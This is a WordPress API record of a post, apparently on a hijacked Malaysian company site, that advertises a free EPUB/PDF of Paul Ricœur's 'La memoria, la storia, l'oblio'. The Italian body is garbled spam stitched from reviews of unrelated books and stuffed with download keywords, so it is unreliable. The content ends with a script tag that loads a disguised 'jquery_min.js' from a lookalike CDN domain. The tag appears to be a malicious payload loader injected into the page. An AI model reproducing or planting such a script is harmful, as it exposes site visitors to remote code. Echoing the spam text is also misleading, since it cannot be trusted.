{"id":66121,"date":"2025-11-01T01:40:58","date_gmt":"2025-10-31T17:40:58","guid":{"rendered":"https:\/\/www.sinaranadvance.com.my\/?p=66121"},"modified":"2025-12-25T20:40:58","modified_gmt":"2025-12-25T12:40:58","slug":"la-memoria-la-storia-loblio-epub-pdf","status":"publish","type":"post","link":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/","title":{"rendered":"La memoria, la storia, l&#8217;oblio &#8211; EPUB PDF"},"content":{"rendered":"<h1>La memoria, la storia, l&#8217;oblio , Paul Ric\u0153ur<\/h1>\n<p>Mentre Val naviga le sfide e i trionfi della lista dei desideri di sua epub gratis inizia a scoprire una versione pi\u00f9 autentica di se stessa, capace e forte. Sebbene possa non essere di gusto di ogni lettore, \u00e8 certamente una lettura coinvolgente e stimolante. La lingua era un po&#8217; un ostacolo, ma la bellezza del contenuto ha reso tutto degno di essere fatto. Ci\u00f2 che rende un libro veramente grande \u00e8 la sua capacit\u00e0 di risuonare con i lettori a livello personale, offrendo qualcosa di unico a ogni persona.<\/p>\n<p>C&#8217;\u00e8 qualcosa di soddisfacente nel perdersi in una buona storia, non \u00e8 vero? Anche se potrebbe non essere stato il libro pi\u00f9 dinamico o ricco di azione, la storia era coinvolgente e stimolante, inducendomi a riflettere epub miei valori e La memoria, la storia, l&#8217;oblio<\/p>\n<p>Tuttavia, gli strappi della trama, sebbene sorprendenti, a volte sembravano un tentativo forzato di mantenere il lettore coinvolto. Come qualcuno che di solito non \u00e8 interessato allo sport, sono stato sorpreso da quanto ho apprezzato questo libro, forse perch\u00e9 non si tratta solo delle partite, ma delle persone, delle personalit\u00e0 e delle storie che lo rendono cos\u00ec coinvolgente. L&#8217;esplorazione dell&#8217;autore delle regressioni di vite passate \u00e8 sia online che accessibile. I suoi resoconti delle sessioni di ipnosi e dei messaggi profondi dei suoi soggetti sono veramente affascinanti. Alla fine, sono stati i piccoli momenti silenziosi che hanno risuonato pi\u00f9 profondamente con me, un promemoria commovente della bellezza nella semplicit\u00e0, e del potere della sottigliezza nella narrazione.<\/p>\n<h2>PDF La memoria, la storia, l&#8217;oblio<\/h2>\n<p>Era un libro che sfidava le mie convinzioni, mi costringeva a confrontarmi con i miei pregiudizi e La memoria, la storia, l&#8217;oblio eppure, \u00e8 stato proprio questo disagio a renderlo cos\u00ec prezioso, come una medicina amara e-book alla online guarisce.<\/p>\n<p>Mentre scarica le pagine di questo libro, mi sono trovato attratto nel mondo delle corse di cavalli, con il suo glamour e la sua emozione, ma anche il suo lato oscuro, dove la corruzione e La memoria, la storia, l&#8217;oblio possono avere conseguenze devastanti. Voltando le pagine, mi sono trovato sempre pi\u00f9 deluso dalla mancanza di autonomia e profondit\u00e0 del protagonista. Il mondo dei libri \u00e8 un luogo vasto e meraviglioso, pieno di storie e personaggi incredibili che hanno il potere di coinvolgere e ispirare noi.<\/p>\n<p>Mi sono trovato ebook nel mondo del racconto, un mondo che sembrava sia familiare che strano, come un sogno a met\u00e0 ricordato o una fantasia dell&#8217;infanzia, e non volevo andarmene. L&#8217;uso della prefigurazione della storia ha aggiunto un livello di tensione e suspense, invitandomi a ricomporre il mistero. Mentre la storia era avvincente, erano i temi sottostanti che risuonavano di pi\u00f9 con me, una potente ebook gratis italiano della condizione umana, con La memoria, la storia, l&#8217;oblio le sue debolezze e i suoi difetti.<\/p>\n<h3>Paul Ric\u0153ur italiano<\/h3>\n<p>Mentre leggevo, mi sono trovato a ridere e piangere insieme ai personaggi, sentendomi come se facessi parte del loro viaggio e fossi investito nella loro felicit\u00e0. \u00c8 possibile che io non fossi kindle il pubblico giusto per questo libro, poich\u00e9 i temi e i personaggi non sono riusciti a risuonare con me a un livello significativo. Il rapporto tra Ellis e Avery ebook online gratis un turbine di emozioni, ma alla fine, \u00e8 una storia di crescita e auto-scoperta. Forse \u00e8 il marchio di un grande libro che possa sfidare le nostre La memoria, la storia, l&#8217;oblio costringerci a confrontare i nostri pregiudizi e pregiudizi. Lo stile di scrittura era spesso bellissimo, la pdf libro lirica e poesia aggiungevano un livello di bellezza e meraviglia al racconto.<\/p>\n<p>La narrazione \u00e8 ricca e stratificata, rendendola una lettura avvincente per chiunque sia interessato libro gratis personaggi complessi. Sebbene la storia sia interessante, lo stile di scrittura non mi ha completamente convinto. \u00c8 una lettura discreta, ma libro una che mi sentirei di consigliare subito.<\/p>\n<p>Le fotografie fb2 giovane Norma Jeane sono semplicemente mozzafiato, offrendo un&#8217;occhiata personale e ebooks online alla sua vita. Mia moglie, la cui madre \u00e8 cinese malese, ha pensato che La memoria, la storia, l&#8217;oblio libro colpisse il bersaglio perfettamente.<\/p>\n<h3>La memoria, la storia, l&#8217;oblio pdf<\/h3>\n<p>Anche se non era un libro perfetto, la voce unica e la prospettiva dell&#8217;autore brillavano in ogni pagina, creando un&#8217;esperienza leggere ebook lettura sia memorabile che impattante. Mentre leggevo, ho avuto la sensazione di essere in viaggio, su un percorso tortuoso che mi ha portato attraverso montagne e valli, oscurit\u00e0 e luce. Esaminando le vite e le esperienze La memoria, la storia, l&#8217;oblio altri, possiamo acquisire una comprensione pi\u00f9 profonda del mondo e delle sue molte complessit\u00e0, e sviluppare italiano maggiore apprezzamento per il ebook gratis della narrazione.<\/p>\n<p>La scrittura di John Steinbeck \u00e8 un tributo al potere del racconto, che ha la capacit\u00e0 di abbattere barriere e riunire le persone, coltivando empatia e comprensione. Come qualcuno che non \u00e8 tipicamente attratto da questo genere, sono stato sorpreso da ebooks mi sia piaciuto il libro e da come abbia sfidato le mie ipotesi sul mondo e le sue molte complessit\u00e0. I libri del Dr. Nicolosi sono un promemoria severo del danno che libro leggere essere causato a La memoria, la storia, l&#8217;oblio della terapia. I suoi metodi non solo sono inefficaci, ma profondamente dannosi. \u00c8 una storia d&#8217;avvertimento sui pericoli della pseudoscienza.<\/p>\n<p>L&#8217;avvertimento riguardo a un leggero romanticismo e a mani tenute in modo suggestivo aggiunge un audiolibro di mistero al La memoria, la storia, l&#8217;oblio<\/p>\n<p>L&#8217;adattamento in balletto de &#8216;La Bella Addormentata&#8217; \u00e8 un&#8217;introduzione leggere epub all&#8217;arte per i bambini, che combina elementi visivi e uditivi in modo meraviglioso. La storia presentata in questo libro \u00e8 un potente promemoria dell&#8217;importanza di prendersi cura di noi stessi e di coltivare una comprensione pi\u00f9 profonda del mondo che ci circonda. La prosa dell&#8217;autore era come una brezza gentile in una giornata d&#8217;estate, rilassante e calma, ma, sotto la superficie, percepivo una profondit\u00e0, una La memoria, la storia, l&#8217;oblio che desideravo esplorare.<\/p>\n<p>\u00c8 un libro raro che pu\u00f2 bilanciare l&#8217;oscurit\u00e0 online realt\u00e0 con la leggerezza della speranza, ma questo \u00e8 riuscito a farlo con notevole eleganza. C&#8217;\u00e8 un fascino innegabile nel racconto sincero, anche se un po&#8217; spietato, libro italiano sulla sua vita accanto a Tennessee Williams, un viaggio segnato da creativit\u00e0, eccessi e la ricerca incessante dell&#8217;espressione artistica, a qualsiasi costo.<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?id=10110014\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La memoria, la storia, l&#8217;oblio , Paul Ric\u0153ur Mentre Val naviga le sfide e i trionfi della lista dei desideri di sua epub gratis inizia a scoprire una versione pi\u00f9 autentica di se stessa, capace e forte. Sebbene possa non essere di gusto di ogni lettore, \u00e8 certamente una lettura coinvolgente e stimolante. La lingua [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-66121","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>La memoria, la storia, l&#039;oblio - EPUB PDF - Sinaran Advance Group<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"La memoria, la storia, l&#039;oblio - EPUB PDF - Sinaran Advance Group\" \/>\n<meta property=\"og:description\" content=\"La memoria, la storia, l&#8217;oblio , Paul Ric\u0153ur Mentre Val naviga le sfide e i trionfi della lista dei desideri di sua epub gratis inizia a scoprire una versione pi\u00f9 autentica di se stessa, capace e forte. Sebbene possa non essere di gusto di ogni lettore, \u00e8 certamente una lettura coinvolgente e stimolante. La lingua [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/\" \/>\n<meta property=\"og:site_name\" content=\"Sinaran Advance Group\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-31T17:40:58+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-25T12:40:58+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d\"},\"headline\":\"La memoria, la storia, l&#8217;oblio &#8211; EPUB PDF\",\"datePublished\":\"2025-10-31T17:40:58+00:00\",\"dateModified\":\"2025-12-25T12:40:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/\"},\"wordCount\":1044,\"publisher\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\"},\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/\",\"name\":\"La memoria, la storia, l'oblio - EPUB PDF - Sinaran Advance Group\",\"isPartOf\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#website\"},\"datePublished\":\"2025-10-31T17:40:58+00:00\",\"dateModified\":\"2025-12-25T12:40:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.sinaranadvance.com.my\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"La memoria, la storia, l&#8217;oblio &#8211; EPUB PDF\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#website\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/\",\"name\":\"Sinaran Advance Group\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\",\"name\":\"Sinaran Advance Group\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"contentUrl\":\"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"width\":1085,\"height\":675,\"caption\":\"Sinaran Advance Group\"},\"image\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/sinaranadvance.com.my\"],\"url\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"La memoria, la storia, l'oblio - EPUB PDF - Sinaran Advance Group","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/","og_locale":"en_US","og_type":"article","og_title":"La memoria, la storia, l'oblio - EPUB PDF - Sinaran Advance Group","og_description":"La memoria, la storia, l&#8217;oblio , Paul Ric\u0153ur Mentre Val naviga le sfide e i trionfi della lista dei desideri di sua epub gratis inizia a scoprire una versione pi\u00f9 autentica di se stessa, capace e forte. Sebbene possa non essere di gusto di ogni lettore, \u00e8 certamente una lettura coinvolgente e stimolante. La lingua [&hellip;]","og_url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/","og_site_name":"Sinaran Advance Group","article_published_time":"2025-10-31T17:40:58+00:00","article_modified_time":"2025-12-25T12:40:58+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/#article","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/"},"author":{"name":"admin","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d"},"headline":"La memoria, la storia, l&#8217;oblio &#8211; EPUB PDF","datePublished":"2025-10-31T17:40:58+00:00","dateModified":"2025-12-25T12:40:58+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/"},"wordCount":1044,"publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/","url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/","name":"La memoria, la storia, l'oblio - EPUB PDF - Sinaran Advance Group","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/#website"},"datePublished":"2025-10-31T17:40:58+00:00","dateModified":"2025-12-25T12:40:58+00:00","breadcrumb":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/11\/01\/la-memoria-la-storia-loblio-epub-pdf\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.sinaranadvance.com.my\/"},{"@type":"ListItem","position":2,"name":"La memoria, la storia, l&#8217;oblio &#8211; EPUB PDF"}]},{"@type":"WebSite","@id":"https:\/\/www.sinaranadvance.com.my\/#website","url":"https:\/\/www.sinaranadvance.com.my\/","name":"Sinaran Advance Group","description":"","publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.sinaranadvance.com.my\/#organization","name":"Sinaran Advance Group","url":"https:\/\/www.sinaranadvance.com.my\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/","url":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","contentUrl":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","width":1085,"height":675,"caption":"Sinaran Advance Group"},"image":{"@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/sinaranadvance.com.my"],"url":"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/66121","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/comments?post=66121"}],"version-history":[{"count":1,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/66121\/revisions"}],"predecessor-version":[{"id":66122,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/66121\/revisions\/66122"}],"wp:attachment":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/media?parent=66121"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/categories?post=66121"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/tags?post=66121"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}